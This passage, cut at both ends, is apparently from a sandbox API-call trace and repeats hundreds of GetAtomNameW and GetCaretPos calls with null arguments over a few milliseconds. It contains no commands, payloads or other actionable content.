lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.861] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.861] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.862] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.862] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.869] GetCaretPos (in: 